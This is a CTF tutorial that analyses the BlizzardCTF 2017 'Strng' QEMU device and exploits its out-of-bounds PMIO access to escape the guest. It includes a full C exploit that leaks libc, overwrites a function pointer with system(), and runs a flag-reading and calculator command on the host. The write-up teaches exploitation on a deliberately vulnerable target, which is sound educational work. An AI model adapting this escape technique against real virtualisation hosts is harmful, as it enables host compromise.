Skip to content

Introduction to QEMU Escape

QEMU escape is essentially not very different from userland Pwn challenges; it is just presented in a slightly different form. The challenge itself is typically presented as a QEMU emulated device, which usually implements some functionality and provides user-controllable MMIO/PMIO interfaces. Contestants typically need to write a program that interacts with these interfaces and upload it to the remote host for execution to complete the exploit (similar to kernel Pwn).

Below, we will go through a sample challenge to understand the basic approach for QEMU Pwn challenges.

Example: BlizzardCTF2017 - Strng

Note: The challenge environment can be downloaded from Github. The login username is ubuntu and the password is passw0rd.

Challenge Analysis

First, we examine the startup script and can see that it loads a custom device strng through the -device strng parameter.

./qemu-system-x86_64 \
    -m 1G \
    -device strng \
    -hda my-disk.img \
    -hdb my-seed.img \
    -nographic \
    -L pc-bios/ \
    -enable-kvm \
    -device e1000,netdev=net0 \
    -netdev user,id=net0,hostfwd=tcp::5555-:22

We directly load the QEMU binary into IDA for analysis. First, we find the string "strng" through the Strings window, which leads us to the device's initialization function:

We can see that the device registers both MMIO and PMIO functional interfaces, and places several function pointers at certain positions:

void __fastcall strng_instance_init(Object_0 *obj)
{
  Object_0 *v1; // rax

  v1 = object_dynamic_cast_assert(obj, "strng", "/home/rcvalle/qemu/hw/misc/strng.c", 145, "strng_instance_init");
  *(_QWORD *)&v1[76].ref = &srand;
  v1[76].parent = (Object_0 *)&rand;
  v1[77].class = (ObjectClass_0 *)&rand_r;
}

void __fastcall pci_strng_realize(PCIDevice_0 *pdev, Error_0 **errp)
{
  memory_region_init_io(
    (MemoryRegion_0 *)&pdev[1],
    &pdev->qdev.parent_obj,
    &strng_mmio_ops,
    pdev,
    "strng-mmio",
    0x100uLL);
  pci_register_bar(pdev, 0, 0, (MemoryRegion_0 *)&pdev[1]);
  memory_region_init_io(
    (MemoryRegion_0 *)&pdev[1].io_regions[0].size,
    &pdev->qdev.parent_obj,
    &strng_pmio_ops,
    pdev,
    "strng-pmio",
    8uLL);
  pci_register_bar(pdev, 1, 1u, (MemoryRegion_0 *)&pdev[1].io_regions[0].size);
}

The function pointer placements decompiled by IDA look a bit odd, so let's look at the assembly source directly:

.text:000000000041033E                 call    object_dynamic_cast_assert
.text:0000000000410343 strng = rax                             ; STRNGState *
.text:0000000000410343                 mov     rdx, cs:srand_ptr_0
.text:000000000041034A                 mov     [strng+0BF8h], rdx
.text:0000000000410351                 mov     rdx, cs:rand_ptr_0
.text:0000000000410358                 mov     [strng+0C00h], rdx
.text:000000000041035F                 mov     rdx, cs:rand_r_ptr
.text:0000000000410366                 mov     [strng+0C08h], rdx

Next, we jump to the corresponding functions in the function table for analysis. At (u32*)opaque[701] there is an unsigned int array (which we define as opaque->buf). The MMIO read mainly reads 4 bytes of content from opaque->buf[(addr >> 2)]. While it seems like an out-of-bounds read could be possible, QEMU internally checks whether the MR access range (addr) exceeds the defined memory range, so out-of-bounds reads are actually not possible:

The opaque parameter is actually a custom subclass of the PCIDevice class that is dynamically allocated when the device is loaded.

uint64_t __fastcall strng_mmio_read(void *opaque, hwaddr addr, unsigned int size)
{
  uint64_t result; // rax

  result = -1LL;
  if ( size == 4 && (addr & 3) == 0 )
    result = *((unsigned int *)opaque + (addr >> 2) + 701);
  return result;
}

The MMIO write functionality provides different features depending on the write address (a bit messy):

  • Address 0: Calls the data at (u64*)opaque[383] as a function pointer, with the passed value as the argument
  • Address 1 << 2: Calls the data at (u64*)opaque[384] as a function pointer, and writes the result to opaque->buf[3]
  • Address other value << 2: Writes the passed value at opaque->buf[(addr>>2)]
  • If the address is 3 << 2, then before writing, the data at (u64*)opaque[385] is called as a function pointer with argument &((char*)opaque[2812]), and the passed value is written to opaque->buf[3]
void __fastcall strng_mmio_write(void *opaque, hwaddr addr, uint64_t val, unsigned int size)
{
  hwaddr v4; // rsi
  int v5; // eax
  int vala; // [rsp+8h] [rbp-30h]

  if ( size == 4 && (addr & 3) == 0 )
  {
    v4 = addr >> 2;
    if ( (_DWORD)v4 == 1 )
    {
      *((_DWORD *)opaque + 702) = (*((__int64 (__fastcall **)(void *, hwaddr, uint64_t))opaque + 384))(opaque, v4, val);
    }
    else if ( (_DWORD)v4 )
    {
      if ( (_DWORD)v4 == 3 )
      {
        vala = val;
        v5 = (*((__int64 (__fastcall **)(char *))opaque + 385))((char *)opaque + 2812);
        LODWORD(val) = vala;
        *((_DWORD *)opaque + 704) = v5;
      }
      *((_DWORD *)opaque + (unsigned int)v4 + 701) = val;
    }
    else
    {
      (*((void (__fastcall **)(_QWORD))opaque + 383))((unsigned int)val);
    }
  }
}

The PMIO read functionality performs data reading:

  • If addr == 0, returns the value of (unsigned int *)opaque[700].
  • If addr == 4, obtains the value v4 of (unsigned int *)opaque[700]. If the lower 2 bits are 0, it returns the data at opaque->buf[(v4 >> 2)].

If we can control the value of (unsigned int *)opaque[700], we can directly perform an out-of-bounds read.

uint64_t __fastcall strng_pmio_read(void *opaque, hwaddr addr, unsigned int size)
{
  uint64_t result; // rax
  unsigned int v4; // edx

  result = -1LL;
  if ( size == 4 )
  {
    if ( addr )
    {
      if ( addr == 4 )
      {
        v4 = *((_DWORD *)opaque + 700);
        if ( (v4 & 3) == 0 )
          result = *((unsigned int *)opaque + (v4 >> 2) + 701);
      }
    }
    else
    {
      result = *((unsigned int *)opaque + 700);
    }
  }
  return result;
}

The PMIO write functionality is defined as follows:

  • If addr == 0, the passed value is written to (unsigned int *)opaque[700], so combined with PMIO read we can complete an out-of-bounds read.
  • If addr == 4, obtains the value v4 of (unsigned int *)opaque[700]. If the lower 2 bits are 0, let v5 = v4 >> 2:
  • If v5 == 1, calls the function pointer at (u64*)opaque[384], writes the return value to opaque->buf[1], see code for arguments
  • If v5 == 3, calls the function pointer at (u64*)opaque[385], writes the return value to opaque->buf[3], see code for arguments
  • If v5 != 0, writes the passed value to opaque->buf[v5]
  • If v5 == 1, calls the function pointer at (u64*)opaque[383], with our passed value as the argument
void __fastcall strng_pmio_write(void *opaque, hwaddr addr, uint64_t val, unsigned int size)
{
  unsigned int v4; // eax
  __int64 v5; // rax

  if ( size == 4 )
  {
    if ( addr )
    {
      if ( addr == 4 )
      {
        v4 = *((_DWORD *)opaque + 700);
        if ( (v4 & 3) == 0 )
        {
          v5 = v4 >> 2;
          if ( (_DWORD)v5 == 1 )
          {
            *((_DWORD *)opaque + 702) = (*((__int64 (__fastcall **)(void *, __int64, uint64_t))opaque + 384))(
                                          opaque,
                                          4LL,
                                          val);
          }
          else if ( (_DWORD)v5 )
          {
            if ( (_DWORD)v5 == 3 )
              *((_DWORD *)opaque + 704) = (*((__int64 (__fastcall **)(char *, __int64, uint64_t))opaque + 385))(
                                            (char *)opaque + 2812,
                                            4LL,
                                            val);
            else
              *((_DWORD *)opaque + v5 + 701) = val;
          }
          else
          {
            (*((void (__fastcall **)(_QWORD))opaque + 383))((unsigned int)val);
          }
        }
      }
    }
    else
    {
      *((_DWORD *)opaque + 700) = val;
    }
  }
}

Exploitation

Since the read address for the PMIO read functionality is determined by (unsigned int *)opaque[700], and this value can be modified through PMIO write at addr == 0, and since the challenge initially places some function pointers at the end of opaque, we can leak the libc base address by reading these function pointers.

Similarly, when addr == 4, PMIO write writes data to a specified address + offset, where the offset is our controllable (unsigned int *)opaque[700]. Therefore, we can conveniently hijack the function pointers on opaque, and these function pointers can be triggered through MMIO write and PMIO write. It's not hard to see that we can achieve control flow hijacking by hijacking these function pointers.

When (unsigned int *)opaque[700] == 3, calling the function pointer passes an address on opaque as the first argument, and the data at that location is also controllable by us. Therefore, we can first write a string there, then hijack the function pointer to system() and call it directly to achieve arbitrary command execution on the Host.

Interaction Method

QEMU pwn challenges provide us with a local Linux environment, usually with root privileges (except for some nested challenges that require privilege escalation first). Typically, we need to write the exploit in C, statically compile it, and then transfer it to the remote machine for execution. Some challenges also provide a local compilation environment (such as this one), so we only need to transfer the exploit source code to the remote and compile & run it there.

First, let's discuss how to interact with the challenge. QEMU pwn vulnerabilities usually appear in a custom PCI device. We can use the lspci command to view existing PCI devices. At the beginning of each device, you can see a hexadecimal number in the format xx:yy.z, which is actually bus number:device number.function number. When we use lspci -v to view PCI device information, the 4-digit number before the bus number is the PCI domain number.

Usually, we can see an unrecognized device, which is typically the challenge device. Here we can see the PMIO address is 0xc050 and the MMIO address (physical address) is 0xfebf1000:

For PMIO interaction, we can first obtain interaction permissions through iopl(3), then directly use the in() and out() family of functions to read and write ports. Note that the port address should be aligned to the read/write length (e.g., for 4-byte read/write, the port address needs to be aligned to 4). Here is an example:

void pmio_write(uint32_t port, uint32_t val)
{
    outl(val, port);
}

uint32_t pmio_read(uint32_t port)
{
    return inl(port);
}

int main(int argc, char **argv, char **envp)
{
    uint32_t  pmio_port = 0xc050;
    uint32_t  val;
    //...

    if (iopl(3) < 0) {
        errExit("failed to change i/o privilege! no root?");
    }

    /* This is just an example */
    val = pmio_read(pmio_port);
    pmio_write(pmio_port + 4, 0xdeadbeef)

The MMIO interaction method is slightly more involved because MMIO essentially involves directly reading and writing the corresponding physical addresses. However, we can use mmap() to map the resource file under sysfs to complete memory access. Taking this challenge as an example, the number obtained through the lspci command is 00:03.0, so we can use mmap() to map /sys/devices/pci0000:00/0000:00:03.0/resource0 to directly perform MMIO. Similar to PMIO, the MMIO read/write address also needs to be aligned to the read/write length. Here is an example:

void mmio_write(uint32_t *addr, uint32_t val)
{
    *addr = val;
}

uint32_t mmio_read(uint32_t *addr)
{
    return *addr;
}

int main(int argc, char **argv, char **envp)
{
    uint64_t  mmio_addr;
    int   mmio_fd;
    long  val;
    //...
    mmio_fd = open("/sys/devices/pci0000:00/0000:00:03.0/resource0",
            O_RDWR | O_SYNC);
    if (mmio_fd < 0) {
        errExit("failed to open mmio file! wrong path or no root?");
    }

    mmio_addr = (uint64_t)
            mmap(0, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED, mmio_fd, 0);
    if (mmio_addr == MAP_FAILED) {
        errExit("failed to mmap mmio space!");
    }

    val = mmio_read(mmio_addr);
    mmio_write(mmio_addr + 4, 0xbeefdead);

Note: We can also perform PMIO through memory read/write by mapping the /sys/devices/pci0000:00/0000:00:03.0/resource1 file.

The complete exploit is as follows, which executes cat ./flag and a calculator launch command:

#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/mman.h>
#include <stdint.h>
#include <sys/io.h>

#define STRNG_MMIO_REGS 64
#define STRNG_MMIO_SIZE (STRNG_MMIO_REGS * sizeof(uint32_t))

#define STRNG_PMIO_ADDR 0
#define STRNG_PMIO_DATA 4
#define STRNG_PMIO_REGS STRNG_MMIO_REGS
#define STRNG_PMIO_SIZE 8

char calc_str[0x100] = ";cat ./flag;gnome-calculator";
char sh_str[0x100] = "/bin/sh";

void errExit(char * msg)
{
    printf("\033[31m\033[1m[x] Error: \033[0m%s\n", msg);
    exit(EXIT_FAILURE);
}

void mmio_write(uint32_t *addr, uint32_t val)
{
    *addr = val;
}

uint32_t mmio_read(uint32_t *addr)
{
    return *addr;
}

void pmio_write(uint32_t port, uint32_t val)
{
    outl(val, port);
}

uint32_t pmio_read(uint32_t port)
{
    return inl(port);
}

int main(int argc, char **argv, char **envp)
{
    uint64_t    mmio_addr;
    uint32_t    pmio_port = 0xc050;
    int         mmio_fd;
    uint32_t    srand_addr_low, srand_addr_high;
    uint64_t    srand_addr;
    uint64_t    libc_addr;
    uint64_t    system_addr;

    /*
     * initialization
     */
    mmio_fd = open("/sys/devices/pci0000:00/0000:00:03.0/resource0",
            O_RDWR | O_SYNC);
    if (mmio_fd < 0) {
        errExit("failed to open mmio file! wrong path or no root?");
    }

    if (iopl(3) < 0) {
        errExit("failed to change i/o privilege! no root?");
    }

    mmio_addr = (uint64_t)
            mmap(0, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED, mmio_fd, 0);
    if (mmio_addr == MAP_FAILED) {
        errExit("failed to mmap mmio space!");
    }

    /*
     * regs[3] is not writable, because for addr 3 the rand_r() will be called
     * so we fill some useless string there
     */
    for (int i = 0; i < 4; i++)
        mmio_write((uint32_t*)(mmio_addr + ((2 + i) << 2)), (uint32_t*)"aaaa");

    for (int i = 0; i < 10; i++)
        mmio_write((uint32_t*)(mmio_addr + ((6 + i) << 2)), ((uint32_t*)calc_str)[i]);

    /*
     * exploitation
     */

    /*
     * Stage.I - leaking libc addr
     * set the strng->addr by pmio_write to a oob val
     * so that we can make an oob read by pmio_read
     */
    puts("[*] Stage.I - leaking libc addr\n");

    pmio_write(pmio_port + STRNG_PMIO_ADDR, (STRNG_MMIO_REGS + 1) << 2);
    srand_addr_low = pmio_read(pmio_port + STRNG_PMIO_DATA);
    pmio_write(pmio_port + STRNG_PMIO_ADDR, (STRNG_MMIO_REGS + 2) << 2);
    srand_addr_high = pmio_read(pmio_port + STRNG_PMIO_DATA);

    srand_addr = srand_addr_high;
    srand_addr <<= 32;
    srand_addr += srand_addr_low;
    libc_addr = srand_addr - 0x460a0;
    system_addr = libc_addr + 0x50d60;

    printf("[+] get addr of srand: 0x%llx\n", srand_addr);
    printf("[+] libc addr: 0x%llx\n", libc_addr);
    printf("[+] system addr: 0x%llx\n", system_addr);

    /*
     * Stage.II - overwrite the rand_r ptr
     * set the strng->rand_r to system by oob write in pmio
     */
    puts("\n[*] Stage.II - overwrite the rand_r ptr\n");

    pmio_write(pmio_port + STRNG_PMIO_ADDR, (STRNG_MMIO_REGS + 5) << 2);
    pmio_write(pmio_port + STRNG_PMIO_DATA, (uint32_t) system_addr);
    pmio_write(pmio_port + STRNG_PMIO_ADDR, (STRNG_MMIO_REGS + 6) << 2);
    pmio_write(pmio_port + STRNG_PMIO_DATA, (uint32_t) (system_addr >> 32));

    puts("[+] write done!");

    /*
     * Stage.III - control flow hijack!
     * call the strng->rand_r by pmio_write and hijack the control flow!
     */
    puts("\n[*] Stage.III - control flow hijack\n");

    puts("[*] trigger the strng->rand_r()...");
    pmio_write(pmio_port + STRNG_PMIO_ADDR, 3 << 2);
    pmio_write(pmio_port + STRNG_PMIO_DATA, 0xdeadbeef);

}

REFERENCE

qemu pwn-Blizzard CTF 2017 Strng writeup

【HARDWARE.0x00】PCI 设备简易食用手册